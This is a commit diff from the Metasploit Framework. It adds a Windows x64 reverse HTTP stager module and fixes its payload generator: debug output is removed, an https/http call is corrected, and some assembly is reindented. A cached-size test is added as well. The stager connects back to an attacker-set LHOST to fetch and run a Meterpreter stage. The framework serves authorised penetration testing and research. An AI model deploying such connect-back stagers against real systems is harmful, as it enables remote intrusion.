Add support for x64 reverse_http

Still need to bake in support for proxies in the stagers, but wer'e
getting there.

lib/msf/core/payload/windows/x64/reverse_http.rb

@@ -46,12 +46,11 @@ module Payload::Windows::ReverseHttp_x64
   # Generate the first stage
   #
   def generate(opts={})
-    STDERR.puts("#{opts.inspect}\n")
     ssl = opts[:ssl] || false
 
     # Generate the simple version of this stager if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space
-      return generate_reverse_https({
+      return generate_reverse_http({
         :ssl         => ssl,
         :host        => datastore['LHOST'],
         :port        => datastore['LPORT'],
@@ -244,7 +243,6 @@ module Payload::Windows::ReverseHttp_x64
         jmp get_server_uri
 
       httpopenrequest:
-        ;int 0x03
         mov rcx, rax                  ; HINTERNET (hConnect)
         xor rdx, rdx                  ; NULL pointer (lpszVerb)
         pop r8                        ; String (lpszObjectName)
@@ -314,14 +312,14 @@ module Payload::Windows::ReverseHttp_x64
 
     if opts[:exitfunk]
       asm << %Q^
-        failure:
+      failure:
-          call exitfunk
+        call exitfunk
       ^
     else
       asm << %Q^
-        failure:
+      failure:
-          push 0x56A2B5F0           ; hardcoded to exitprocess for size
+        push 0x56A2B5F0           ; hardcoded to exitprocess for size
-          call rbp
+        call rbp
       ^
     end
 
@@ -373,7 +371,7 @@ module Payload::Windows::ReverseHttp_x64
     if opts[:exitfunk]
       asm << asm_exitfunk(opts)
     end
-    STDERR.puts("#{asm}\n")
+
     asm
   end
 

modules/payloads/stagers/windows/x64/reverse_http.rb

@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+require 'msf/core/payload/windows/x64/reverse_http'
+
+module Metasploit4
+
+  CachedSize = 529
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows
+  include Msf::Payload::Windows::ReverseHttp_x64
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Windows x64 Reverse HTTP Stager',
+      'Description' => 'Tunnel communication over HTTP (Windows x64)',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86_64,
+      'Handler'     => Msf::Handler::ReverseHttp,
+      'Convention'  => 'sockrdi http',
+      'Stager'      => { 'Payload' => '' }))
+  end
+
+  #
+  # Do not transmit the stage over the connection.  We handle this via HTTPS
+  #
+  def stage_over_connection?
+    false
+  end
+
+  #
+  # Always wait at least 20 seconds for this payload (due to staging delays)
+  #
+  def wfs_delay
+    20
+  end
+end

modules/payloads/stagers/windows/x64/reverse_https.rb

@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_https'
 
 module Metasploit4
 
-  CachedSize = 578
+  CachedSize = 568
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows

spec/modules/payloads_spec.rb

@@ -3557,6 +3557,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'windows/x64/meterpreter/bind_tcp'
   end
 
+  context 'windows/x64/meterpreter/reverse_http' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/windows/x64/reverse_http',
+                              'stages/windows/x64/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/meterpreter/reverse_http'
+  end
+
   context 'windows/x64/meterpreter/reverse_https' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [